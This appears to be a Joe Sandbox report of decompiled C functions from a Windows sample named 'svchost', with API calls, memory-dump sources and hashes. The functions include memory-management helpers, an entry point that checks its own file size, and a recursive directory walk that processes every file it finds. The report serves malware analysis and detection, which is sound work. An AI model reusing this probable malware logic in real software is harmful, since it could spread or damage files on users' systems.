                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404BB4, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00404BB4(void* __eax, signed int __ecx, long __edx) {
				long _t2;

				_t2 = SetFilePointer(__eax, __edx, 0, __ecx & 0x000000ff); // executed
				return _t2;
			}




                                                                          0x00404bbc
                                                                          0x00404bc1

                                                                          APIs
                                                                          • SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FilePointer
                                                                          • String ID:
                                                                          • API String ID: 973152223-0
                                                                          • Opcode ID: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
                                                                          • Instruction ID: 68b303876a78b47fa373b2f01407b4ce5b79aa50a67d4c8f5d0a49418ed6adba
                                                                          • Opcode Fuzzy Hash: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
                                                                          • Instruction Fuzzy Hash: 69A002D85902203AF8182363AC5FF37105C97C0B55FD0855E7351754C164EC6A241039
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040137C, Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0040137C(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr* _v32;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t31;
				int _t32;
				intOrPtr* _t35;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				intOrPtr* _t45;

				_t45 =  &_v20;
				_v32 = __ecx;
				 *_t45 = __edx;
				_v28 = 0xffffffff;
				_v24 = 0;
				_t44 = __eax;
				_v20 =  *_t45 + __eax;
				_t35 =  *0x40a5d4; // 0x571f74
				while(_t35 != 0x40a5d4) {
					_t42 =  *_t35;
					_t43 =  *(_t35 + 8);
					if(_t44 <= _t43 && _t43 +  *((intOrPtr*)(_t35 + 0xc)) <= _v20) {
						if(_t43 < _v28) {
							_v28 = _t43;
						}
						_t31 = _t43 +  *((intOrPtr*)(_t35 + 0xc));
						if(_t31 > _v24) {
							_v24 = _t31;
						}
						_t32 = VirtualFree(_t43, 0, 0x8000); // executed
						if(_t32 == 0) {
							 *0x40a5b0 = 1;
						}
						E00401184(_t35);
					}
					_t35 = _t42;
				}
				_t24 = _v32;
				 *_t24 = 0;
				if(_v24 != 0) {
					 *_v32 = _v28;
					_t27 = _v24 - _v28;
					 *((intOrPtr*)(_v32 + 4)) = _t27;
					return _t27;
				}
				return _t24;
			}
















                                                                          0x00401380
                                                                          0x00401383
                                                                          0x00401387
                                                                          0x0040138a
                                                                          0x00401394
                                                                          0x00401398
                                                                          0x0040139f
                                                                          0x004013a3
                                                                          0x004013fc
                                                                          0x004013ab
                                                                          0x004013ad
                                                                          0x004013b2
                                                                          0x004013c3
                                                                          0x004013c5
                                                                          0x004013c5
                                                                          0x004013cb
                                                                          0x004013d2
                                                                          0x004013d4
                                                                          0x004013d4
                                                                          0x004013e0
                                                                          0x004013e7
                                                                          0x004013e9
                                                                          0x004013e9
                                                                          0x004013f5
                                                                          0x004013f5
                                                                          0x004013fa
                                                                          0x004013fa
                                                                          0x00401404
                                                                          0x0040140a
                                                                          0x00401411
                                                                          0x0040141b
                                                                          0x00401421
                                                                          0x00401429
                                                                          0x00000000
                                                                          0x00401429
                                                                          0x00401433

                                                                          APIs
                                                                          • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004013E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: fa7a78eec5dd89a8b83c49400664c27073319ee3a8c610895c3709d3653ec505
                                                                          • Instruction ID: f327295f0dbb7d02968337953404c96d08b75f0734ec548ae522820371e35f3d
                                                                          • Opcode Fuzzy Hash: fa7a78eec5dd89a8b83c49400664c27073319ee3a8c610895c3709d3653ec505
                                                                          • Instruction Fuzzy Hash: CB21E570608741AFD710DF19C880A5FBBE0EB85720F14C96AE8989B7A5D378E841DB5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401434, Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00401434(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x40a5d4; // 0x571f74
				while(_t29 != 0x40a5d4) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                                                          0x0040143b
                                                                          0x0040143f
                                                                          0x00401446
                                                                          0x0040145b
                                                                          0x00401463
                                                                          0x00401469
                                                                          0x0040146f
                                                                          0x00401472
                                                                          0x004014b6
                                                                          0x0040147a
                                                                          0x00401480
                                                                          0x00401484
                                                                          0x00401486
                                                                          0x00401486
                                                                          0x0040148c
                                                                          0x0040148e
                                                                          0x0040148e
                                                                          0x00401494
                                                                          0x004014a1
                                                                          0x004014a8
                                                                          0x004014aa
                                                                          0x004014b0
                                                                          0x00000000
                                                                          0x004014b0
                                                                          0x004014a8
                                                                          0x004014b4
                                                                          0x004014b4
                                                                          0x004014c5

                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004014A1
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 6562d44be094aac9c3416d4300413632571bdfff9e6fcfdcc884fc208ae27054
                                                                          • Instruction ID: 651c7d6b6741c998796b49b102b161bb2341ec2eea25b0c045f05b7ed0c0d4f4
                                                                          • Opcode Fuzzy Hash: 6562d44be094aac9c3416d4300413632571bdfff9e6fcfdcc884fc208ae27054
                                                                          • Instruction Fuzzy Hash: E7117072A04701AFC310DF29CD80A2BB7E1EBC4750F15C63DE598673B5D638AC408795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004014C8, Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 93%
                                                                          			E004014C8(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x40a5d4; // 0x571f74
				while(_t19 != 0x40a5d4) {
					_t9 =  *(_t19 + 8);
					_t14 =  *((intOrPtr*)(_t19 + 0xc)) + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x40a5b0 = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}









                                                                          0x004014cc
                                                                          0x004014dd
                                                                          0x004014e4
                                                                          0x004014ed
                                                                          0x004014f1
                                                                          0x004014f4
                                                                          0x004014f7
                                                                          0x00401537
                                                                          0x004014ff
                                                                          0x00401505
                                                                          0x0040150a
                                                                          0x0040150c
                                                                          0x0040150c
                                                                          0x00401511
                                                                          0x00401513
                                                                          0x00401513
                                                                          0x00401517
                                                                          0x00401522
                                                                          0x00401529
                                                                          0x0040152b
                                                                          0x0040152b
                                                                          0x00401529
                                                                          0x00401535
                                                                          0x00401535
                                                                          0x00401544

                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,0040172F), ref: 00401522
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
                                                                          • Instruction ID: c2f9954cc8299db513f2c37eb2bc070e0fd4fafed15322d1c8bcd52f3136bf23
                                                                          • Opcode Fuzzy Hash: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
                                                                          • Instruction Fuzzy Hash: E501F7736043006FC3109E28DDC092A77A4EBC5324F15053EDA85AB3A1D73AAC0587A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004070DC, Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 31%
                                                                          			E004070DC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _t19;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x407126);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				E004049D0(0, __ebx,  &_v8, __edi, __esi); // executed
				E00404C78(E0040340C(_v8), __ebx, 0xa200, 0x40a698, __edi, __esi); // executed
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E0040712D);
				return E00403094( &_v8);
			}






                                                                          0x004070df
                                                                          0x004070e3
                                                                          0x004070e4
                                                                          0x004070e9
                                                                          0x004070ec
                                                                          0x004070f4
                                                                          0x0040710b
                                                                          0x00407112
                                                                          0x00407115
                                                                          0x00407118
                                                                          0x00407125

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileModuleName
                                                                          • String ID: MZP
                                                                          • API String ID: 514040917-2889622443
                                                                          • Opcode ID: 41121ee7b25dade0bc9d433c7374af51b0025473e269c79932b73fc9af909746
                                                                          • Instruction ID: dbacf8f9bda0d2f3624fed2e55e69454661720eb62c3ca271fb24a4619442e3b
                                                                          • Opcode Fuzzy Hash: 41121ee7b25dade0bc9d433c7374af51b0025473e269c79932b73fc9af909746
                                                                          • Instruction Fuzzy Hash: 32E09270708304AFE701EB72DC13A19B7ACD78A704FA24877E600AA6D1DA7DAE118519
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404B90, Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00404B90(void* __eax) {
				signed int _t4;

				_t4 = CloseHandle(__eax); // executed
				return _t4 & 0xffffff00 | _t4 != 0x00000000;
			}




                                                                          0x00404b91
                                                                          0x00404b9b

                                                                          APIs
                                                                          • CloseHandle.KERNEL32(00000000,00404CD0,00000000,00404CE6), ref: 00404B91
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
                                                                          • Instruction ID: f540dd3953723152695a7cfd94b4b723d26dbf970bde7b3718d3bc06e0259ed2
                                                                          • Opcode Fuzzy Hash: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004080E4, Relevance: .1, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 82%
                                                                          			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _v24;
				char _v28;
				void* _v32;
				char _v36;
				intOrPtr _t26;
				void* _t36;
				void* _t47;
				void* _t48;
				intOrPtr _t71;
				void* _t79;
				void* _t81;
				void* _t86;

				_t86 = __fp0;
				_t81 = __eflags;
				_t76 = __esi;
				_t75 = __edi;
				_t54 = __ebx;
				_v36 = 0;
				_v28 = 0;
				_v32 = 0;
				_v24 = 0;
				E00403F14(0x408054);
				_push(_t79);
				_push(0x408220);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79 + 0xffffffe0;
				E00407080(0x4091a8, 0xb, 0xb);
				E00407080(0x4091b4, 9, 9);
				E00407080(0x4091c0, 3, 3);
				E00407080(0x4091dc, 3, 3);
				_t26 =  *0x409210; // 0x40919c
				E00407080(_t26, 0xb, 0xb); // executed
				E004070DC(__ebx, __edi, __esi, _t81); // executed
				E004049D0(0, __ebx,  &_v24, __edi, __esi);
				if(E00404F6C(_v24) > 0xa200) {
					E00407678(_t54, _t75, _t76); // executed
				}
				E00407E90(_t54, _t75, _t76); // executed
				_t60 = 3;
				_t70 = 3;
				E00407080(0x4091c4, 3, 3);
				_t36 = E00404AE8(_t54, _t75, _t76);
				_t83 = _t36;
				if(_t36 != 0) {
					E004049D0(0, _t54,  &_v28, _t75, _t76);
					_push(_v28);
					_t60 = 3;
					E004031F4( &_v32, 3, 0x4091c4);
					_t70 = _v32;
					_pop(_t47);
					_t48 = E00406FE4(_t47, _t54, _v32, _t83);
					_t84 = _t48;
					if(_t48 != 0) {
						_t70 =  &_v36;
						E004049D0(1, _t54,  &_v36, _t75, _t76);
						E00407D9C(_v36, _t54,  &_v36, _t75, _t76); // executed
					}
				}
				E004079A0(_t54, _t75, _t76, _t84); // executed
				E0040759C(_t54, _t60, _t70, _t75, _t76, _t84, _t86); // executed
				_pop(_t71);
				 *[fs:eax] = _t71;
				_push(E00408227);
				return E004030B8( &_v36, 4);
			}















                                                                          0x004080e4
                                                                          0x004080e4
                                                                          0x004080e4
                                                                          0x004080e4
                                                                          0x004080e4
                                                                          0x004080ec
                                                                          0x004080ef
                                                                          0x004080f2
                                                                          0x004080f5
                                                                          0x004080fd
                                                                          0x00408104
                                                                          0x00408105
                                                                          0x0040810a
                                                                          0x0040810d
                                                                          0x0040811f
                                                                          0x00408133
                                                                          0x00408147
                                                                          0x0040815b
                                                                          0x00408160
                                                                          0x0040816f
                                                                          0x00408174
                                                                          0x0040817e
                                                                          0x00408190
                                                                          0x00408192
                                                                          0x00408192
                                                                          0x00408197
                                                                          0x004081a1
                                                                          0x004081a6
                                                                          0x004081ab
                                                                          0x004081b0
                                                                          0x004081b5
                                                                          0x004081b7
                                                                          0x004081be
                                                                          0x004081c6
                                                                          0x004081cf
                                                                          0x004081d4
                                                                          0x004081d9
                                                                          0x004081dc
                                                                          0x004081dd
                                                                          0x004081e2
                                                                          0x004081e4
                                                                          0x004081e6
                                                                          0x004081ee
                                                                          0x004081f6
                                                                          0x004081f6
                                                                          0x004081e4
                                                                          0x004081fb
                                                                          0x00408200
                                                                          0x00408207
                                                                          0x0040820a
                                                                          0x0040820d
                                                                          0x0040821f

                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileFindModule$CloseFirstHandleName
                                                                          • String ID:
                                                                          • API String ID: 2572062711-0
                                                                          • Opcode ID: dd04900b1eda66457b3e54522726fafad356c8816e377336a90270cb981f17ff
                                                                          • Instruction ID: ce7274d5a0203330cd45a7cf6d0e011d083bf460e717dce8afa0a39e5ced3773
                                                                          • Opcode Fuzzy Hash: dd04900b1eda66457b3e54522726fafad356c8816e377336a90270cb981f17ff
                                                                          • Instruction Fuzzy Hash: D4211E70B142054BEB40B7B6C95279F76A5DB88304F50493FE544BB3C2DA3DAD0586AE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004074B4, Relevance: .1, Instructions: 81COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 60%
                                                                          			E004074B4(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t34;
				intOrPtr _t62;
				void* _t71;
				void* _t72;
				void* _t74;
				intOrPtr _t77;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v8 = __eax;
				E004033FC(_v8);
				_push(_t77);
				_push(0x40758b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t77;
				E004031F4( &_v12, 3, 0x4091dc);
				_t49 = E004052AC(_v8, 0, _v12);
				_t71 = E0040532C(_t25) - 1;
				if(_t71 >= 0) {
					_t72 = _t71 + 1;
					_t74 = 0;
					do {
						_t34 = E0040534C(_t49, _t74);
						_t81 = _t34;
						if(_t34 == 0) {
							E00405338(_t49,  &_v28, _t74);
							E00403258( &_v24, _v28,  *((intOrPtr*)(_t49 + 0x1c)));
							E004071D0(_v24, _t49, _t72, _t74); // executed
						} else {
							E00405338(_t49,  &_v20, _t74);
							E00403258( &_v16, _v20,  *((intOrPtr*)(_t49 + 0x1c)));
							E004074B4(_v16, _t49, _t72, _t74, _t81, _a4); // executed
						}
						_t74 = _t74 + 1;
						_t72 = _t72 - 1;
					} while (_t72 != 0);
				}
				E00404520(_t49);
				_pop(_t62);
				 *[fs:eax] = _t62;
				_push(E00407592);
				return E004030B8( &_v28, 6);
			}















                                                                          0x004074b9
                                                                          0x004074ba
                                                                          0x004074bb
                                                                          0x004074bc
                                                                          0x004074bd
                                                                          0x004074be
                                                                          0x004074c2
                                                                          0x004074c8
                                                                          0x004074cf
                                                                          0x004074d0
                                                                          0x004074d5
                                                                          0x004074d8
                                                                          0x004074e8
                                                                          0x004074fa
                                                                          0x00407505
                                                                          0x00407508
                                                                          0x0040750a
                                                                          0x0040750b
                                                                          0x0040750d
                                                                          0x00407511
                                                                          0x00407516
                                                                          0x00407518
                                                                          0x0040754a
                                                                          0x00407558
                                                                          0x00407560
                                                                          0x0040751a
                                                                          0x00407525
                                                                          0x00407533
                                                                          0x0040753b
                                                                          0x00407540
                                                                          0x00407565
                                                                          0x00407566
                                                                          0x00407566
                                                                          0x0040750d
                                                                          0x0040756b
                                                                          0x00407572
                                                                          0x00407575
                                                                          0x00407578
                                                                          0x0040758a

                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fd7c348ce77f50c17542cebb3b0538e5ca6a1de9245a361f45dd7a6b294aa538
                                                                          • Instruction ID: 101897594dce54360dc52a275b3a014dbc9cabf376d6d76c5a5bbcf91f550c41
                                                                          • Opcode Fuzzy Hash: fd7c348ce77f50c17542cebb3b0538e5ca6a1de9245a361f45dd7a6b294aa538
                                                                          • Instruction Fuzzy Hash: 53218830B045096FCB04EF65CC8299F77A9EB84304B60447FB801B77C2DA78EE058B55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406E94, Relevance: .0, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E00406E94(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _t20;
				void* _t24;
				intOrPtr _t40;
				void* _t46;

				_push(__ebx);
				_v16 = 0;
				_v20 = 0;
				_push(_t46);
				_push(0x406f22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff0;
				E00405008( &_v16, 1, __ecx);
				_push( &_v16);
				E004031F4( &_v20, 0xb, 0x40919c);
				_pop(_t20);
				E00403214(_t20, _v20);
				_t24 = E00404C78(E0040340C(_v16), 1, 8,  &_v12, __edi, __esi); // executed
				if(_t24 != 0) {
					E004057D8(__fp0);
					asm("fcomp dword [0x406f30]");
					asm("fnstsw ax");
					asm("sahf");
				}
				_pop(_t40);
				 *[fs:eax] = _t40;
				_push(E00406F29);
				return E004030B8( &_v20, 2);
			}










                                                                          0x00406e9a
                                                                          0x00406e9d
                                                                          0x00406ea0
                                                                          0x00406ea5
                                                                          0x00406ea6
                                                                          0x00406eab
                                                                          0x00406eae
                                                                          0x00406eb6
                                                                          0x00406ebe
                                                                          0x00406ecc
                                                                          0x00406ed4
                                                                          0x00406ed5
                                                                          0x00406eea
                                                                          0x00406ef1
                                                                          0x00406ef3
                                                                          0x00406efb
                                                                          0x00406f01
                                                                          0x00406f03
                                                                          0x00406f04
                                                                          0x00406f09
                                                                          0x00406f0c
                                                                          0x00406f0f
                                                                          0x00406f21

                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LocalPathTempTime
                                                                          • String ID:
                                                                          • API String ID: 2118298429-0
                                                                          • Opcode ID: 4d43c894cee0dd55262f3b1b2c5c40d1f0ba545ea5d4454e7357d5f13f266e22
                                                                          • Instruction ID: 68f96da1d51e9565b10b5108b435a8bc67f0bfec9723d228dfcbae9d3fbb17ab
                                                                          • Opcode Fuzzy Hash: 4d43c894cee0dd55262f3b1b2c5c40d1f0ba545ea5d4454e7357d5f13f266e22
                                                                          • Instruction Fuzzy Hash: 4A0175709042099FDB00EFA5DC5159FB7BDFB45300F52857BE414F36C5DB38AA148A69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004052AC, Relevance: .0, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004052AC(void* __eax, void* __ecx, void* __edx) {
				void* __esi;
				void* _t7;
				intOrPtr _t11;
				void* _t14;

				_t14 = __eax;
				_t11 =  *0x40447c; // 0x404488
				_t7 = E004044F8(_t11, 0);
				E00405634(_t7, __edx, _t14, _t14, 0, __ecx); // executed
				return _t7;
			}







                                                                          0x004052b4
                                                                          0x004052b6
                                                                          0x004052c3
                                                                          0x004052cc
                                                                          0x004052d7

                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileFind$FirstNext
                                                                          • String ID:
                                                                          • API String ID: 1690352074-0
                                                                          • Opcode ID: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
                                                                          • Instruction ID: b59b8e1bf290491f0b5bd01f3f1f1884d5f58955f35eb0aac9512fedb03d6d3a
                                                                          • Opcode Fuzzy Hash: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
                                                                          • Instruction Fuzzy Hash: 70D0A76230111417870065BF2C84C2BF3CDCBCD565391413AB208D7341DD35AC0742B8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402448, Relevance: .0, Instructions: 14COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E00402448(void* __eax) {
				void* _t3;
				void* _t6;

				if(__eax <= 0) {
					_t6 = 0;
				} else {
					_t3 =  *0x409030(); // executed
					_t6 = _t3;
					if(_t6 == 0) {
						E00402530(1);
					}
				}
				return _t6;
			}





                                                                          0x0040244b
                                                                          0x00402462
                                                                          0x0040244d
                                                                          0x0040244d
                                                                          0x00402453
                                                                          0x00402457
                                                                          0x0040245b
                                                                          0x0040245b
                                                                          0x00402457
                                                                          0x00402467

                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
